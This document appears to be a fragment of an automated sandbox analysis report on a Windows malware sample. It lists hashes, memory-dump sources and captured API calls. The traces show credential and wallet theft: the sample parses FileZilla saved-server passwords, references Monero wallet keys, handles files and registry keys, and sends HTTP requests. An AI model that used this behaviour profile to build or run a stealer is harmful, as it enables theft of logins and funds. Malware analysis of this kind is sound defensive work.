                                      • Instruction Fuzzy Hash: 67513B62E09BD585C7058B7544502EEBFB21FE6210F1E829EC49C5F383C3759689D3E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 581d0888438d113ac57163597703552e6b9927ecb08dae4831b329ecdd16bf94
                                      • Instruction ID: 3f3502599059d1db8c71a64c7fed1a641faaa1ee36d0df5749f336dbecaa8d33
                                      • Opcode Fuzzy Hash: 581d0888438d113ac57163597703552e6b9927ecb08dae4831b329ecdd16bf94
                                      • Instruction Fuzzy Hash: E53109B368D608DBD310AE14EC857FAB7E4EBC6311F05453F95C29F728E631281286D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                      • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00F30DBF,00F30DBE,00F30DBB,00F30DBA), ref: 00F204C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F204C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F204E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F204F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F2052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F2053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00F20579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F20587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F205C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F205D5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F20662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F2067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F20692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F206AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00F206C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00F206D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 00F206E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F206F3
                                      • lstrcat.KERNEL32(?,00F31770), ref: 00F20702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F20715
                                      • lstrcat.KERNEL32(?,00F31774), ref: 00F20724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00F20733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F20746
                                      • lstrcat.KERNEL32(?,00F31780), ref: 00F20755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00F20764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F20777
                                      • lstrcat.KERNEL32(?,00F31790), ref: 00F20786
                                      • lstrcat.KERNEL32(?,00F31794), ref: 00F20795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F207EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: de743c5781ecf3ccf5d9e48c493dc7d7bded0ec9594ca7d31d104e30b079becd
                                      • Instruction ID: 0555a6936f5e143dbb730bab0231fbaa9bcfb18674998780fff2a162320c50b1
                                      • Opcode Fuzzy Hash: de743c5781ecf3ccf5d9e48c493dc7d7bded0ec9594ca7d31d104e30b079becd
                                      • Instruction Fuzzy Hash: 8BD16072D00218ABDB08EBF0ED56EEEB779BF54310F408558F512B6095DF38AA44DB62
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                        • Part of subcall function 00F14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F15A48
                                      • StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F15A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F15BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01D8E9E8,00000000,?,01D8A2A0,00000000,?,00F31B4C), ref: 00F15EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00F15ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F15EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F15EEA
                                      • lstrlen.KERNEL32(00000000), ref: 00F15EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00F15F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F15F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00F15F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F15F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00F15F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00F16000
                                      • InternetCloseHandle.WININET(00000000), ref: 00F1600D
                                      • HttpOpenRequestA.WININET(00000000,01D8EA38,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F15C48
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00F16017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: 8e1ce18ff2f90ddf615da7356b5a56b0bfbf5f6591b2664fd120fc7e5eda852b
                                      • Instruction ID: 4e0b5244a4cd5fc871f5e2510afb820fca9d9c3ff84f98500333d47ca167ac69
                                      • Opcode Fuzzy Hash: 8e1ce18ff2f90ddf615da7356b5a56b0bfbf5f6591b2664fd120fc7e5eda852b
                                      • Instruction Fuzzy Hash: 49120071920128ABCB19EBE0ECA5FEEB379BF54700F404599F10676091EF746A48DF61
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1D083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F1D1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F1D1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D308
                                      • lstrcat.KERNEL32(?,00F31570), ref: 00F1D317
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D32A
                                      • lstrcat.KERNEL32(?,00F31574), ref: 00F1D339
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D34C
                                      • lstrcat.KERNEL32(?,00F31578), ref: 00F1D35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D36E
                                      • lstrcat.KERNEL32(?,00F3157C), ref: 00F1D37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D390
                                      • lstrcat.KERNEL32(?,00F31580), ref: 00F1D39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D3B2
                                      • lstrcat.KERNEL32(?,00F31584), ref: 00F1D3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D3D4
                                      • lstrcat.KERNEL32(?,00F31588), ref: 00F1D3E3
                                        • Part of subcall function 00F2AB30: lstrlen.KERNEL32(00F14F55,?,?,00F14F55,00F30DDF), ref: 00F2AB3B
                                        • Part of subcall function 00F2AB30: lstrcpy.KERNEL32(00F30DDF,00000000), ref: 00F2AB95
                                      • lstrlen.KERNEL32(?), ref: 00F1D42A
                                      • lstrlen.KERNEL32(?), ref: 00F1D439
                                        • Part of subcall function 00F2AD80: StrCmpCA.SHLWAPI(00000000,00F31568,00F1D2A2,00F31568,00000000), ref: 00F2AD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F1D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 1e34f137d2729219f61d6ee0d45b7837a259f4d7b6ec29963a800b884b7a6bae
                                      • Instruction ID: 300abe0815443599afc0c090c6af05f2aadd7abe594d77af283db0ba51c27e8d
                                      • Opcode Fuzzy Hash: 1e34f137d2729219f61d6ee0d45b7837a259f4d7b6ec29963a800b884b7a6bae
                                      • Instruction Fuzzy Hash: 53E17071910118ABDB18EBE0EDA6EEE7379BF54301F404568F117B6091DF38AE48DB62
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01D8D4D0,00000000,?,00F31544,00000000,?,?), ref: 00F1CB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F1CB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00F1CB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F1CBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F1CBD9
                                      • StrStrA.SHLWAPI(?,01D8D458,00F30B56), ref: 00F1CBF7
                                      • StrStrA.SHLWAPI(00000000,01D8D4A0), ref: 00F1CC1E
                                      • StrStrA.SHLWAPI(?,01D8D7C0,00000000,?,00F31550,00000000,?,00000000,00000000,?,01D891F8,00000000,?,00F3154C,00000000,?), ref: 00F1CDA2
                                      • StrStrA.SHLWAPI(00000000,01D8D640), ref: 00F1CDB9
                                        • Part of subcall function 00F1C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F1C971
                                        • Part of subcall function 00F1C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F1C97C
                                      • StrStrA.SHLWAPI(?,01D8D640,00000000,?,00F31554,00000000,?,00000000,01D891B8), ref: 00F1CE5A
                                      • StrStrA.SHLWAPI(00000000,01D88FE8), ref: 00F1CE71
                                        • Part of subcall function 00F1C920: lstrcat.KERNEL32(?,00F30B47), ref: 00F1CA43
                                        • Part of subcall function 00F1C920: lstrcat.KERNEL32(?,00F30B4B), ref: 00F1CA57
                                        • Part of subcall function 00F1C920: lstrcat.KERNEL32(?,00F30B4E), ref: 00F1CA78
                                      • lstrlen.KERNEL32(00000000), ref: 00F1CF44
                                      • CloseHandle.KERNEL32(00000000), ref: 00F1CF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 37bc2732dd99b7dbb04ef17cdb08a9ec3156c2c8d8bc90042af7ee17a95605d2
                                      • Instruction ID: c59bd1f2de02194baad9474da04a91d0e336203edd89b73cdd80ab090bc4e526
                                      • Opcode Fuzzy Hash: 37bc2732dd99b7dbb04ef17cdb08a9ec3156c2c8d8bc90042af7ee17a95605d2
                                      • Instruction Fuzzy Hash: EEE10E71900118ABCB19EBE4ECA2FEEB779BF54300F4045A9F10677191EF346A89DB61
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,01D8B408,00000000,00020019,00000000,00F305BE), ref: 00F28534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F285B6
                                      • wsprintfA.USER32 ref: 00F285E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F2860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F2861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F28629
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
